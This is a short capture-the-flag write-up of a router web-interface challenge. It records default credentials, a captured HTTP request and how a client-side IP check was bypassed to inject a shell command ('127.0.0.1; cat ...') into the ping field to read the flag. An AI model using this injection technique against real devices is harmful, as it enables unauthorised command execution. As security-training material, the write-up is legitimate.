log into http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000/status
default username is blank ""
default password is "admin"

Kernel Version: #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014
Firmware version: 31.33.7-sp2 ZOMGOPTIMIZED - build 69420
Router Name: routarded
Router Model: Pwnmebox
System Time: Sat May 17 00:52:57 2014
MAC Address 69:B0:0B:FA:CE:69
Hostname: routarded
Uptime: 1 second

MEMORY
Free Physical: 1947088/3838876
Free Virtual: 0/0

==========================================================================================================

From crymsen:
crymsen> the ping utility through the web allows for command injection
<crymsen> it uses a client side javascript to enforce the input to be an IP
<crymsen> which you can circumvent
<crymsen> so you can append commands to the 'ping' they're issuing

==========================================================================================================

Format of outbound message:

POST /settings.cgi HTTP/1.1
Host: routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000
Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Authorization: Basic OmFkbWlu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000/diag
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

action=doPing&inputIPAddress=54.82.181.125HTTP/1.1 302 FOUND

==========================================================================================================

Moving forward with downloading browser plugin for tampering
Had to run Tamper Data on Firefox (not many other options).

==========================================================================================================

Had a hard time getting the plugin going
TodayandTomorrow in irc helped me with activating it and with the format of the request
Hit ALT -> Tools -> Tamper Data -> start tamper
Basically entered loopback for IP Address field for Ping
When I clicked the Ping! button, got a dialog box asking if I wanted to tamper.
Modified ip address field to be: "127.0.0.1; cat /home/routarded flag"

==========================================================================================================

Flag = l0l, can't believe they still do this shit
